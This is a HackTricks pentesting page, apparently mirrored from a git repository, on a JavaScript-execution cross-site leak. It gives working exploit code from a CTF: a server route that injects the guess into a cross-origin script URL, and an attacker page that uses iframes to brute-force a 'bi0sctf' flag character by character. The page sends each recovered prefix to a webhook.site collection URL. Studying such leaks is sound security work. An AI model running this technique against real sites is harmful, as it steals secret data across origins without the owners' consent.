hacktricks/pentesting-web/xs-search/javascript-execution-xs-leak.md
Carlos Polop 06a639f4af a
2024-02-07 05:05:50 +01:00

5 KiB

JavaScript Execution XS Leak

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
// Code that will try ${guess} as flag (need rest of the server code
app.get('/guessing', function(req, res) {
    let guess = req.query.guess
    let page = `<html>
                <head>
                    <script>
                            function foo() {
                                // If not the flag this will be executed
                                window.parent.foo()
                            }
                        </script>
                    <script src="https://axol.space/search?query=${guess}&hint=foo()"></script>
                </head>
                <p>hello2</p>
                </html>`
    res.send(page)
});

Main page that generates iframes to the previous /guessing page to test each possibility

<html>
<head>
    <script>
            let candidateIsGood = false;
            let candidate = ''
            let flag = 'bi0sctf{'
            let guessIndex = -1

            let flagChars = '_0123456789abcdefghijklmnopqrstuvwxyz}ABCDEFGHIJKLMNOPQRSTUVWXYZ'

            // this will get called from our iframe IF the candidate is WRONG
            function foo() {
                candidateIsGood = false
            }

            timerId = setInterval(() => {
                if (candidateIsGood) {
                    flag = candidate
                    guessIndex = -1
                    fetch('https://webhook.site/<yours-goes-here>?flag='+flag)
                }
                
                //Start with true and will be change to false if wrong
                candidateIsGood = true
                guessIndex++
                if (guessIndex >= flagChars.length) {
                    fetch('https://webhook.site/<yours-goes-here>')
                    return
                }
                let guess = flagChars[guessIndex]
                candidate = flag + guess
                let iframe = `<iframe src="/guessing?guess=${encodeURIComponent(candidate)}"></iframe>`
                console.log('iframe: ', iframe)
                hack.innerHTML = iframe
            }
            , 500);
        </script>
</head>
<p>hello</p>
<div id="hack">
</div>
</html>
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥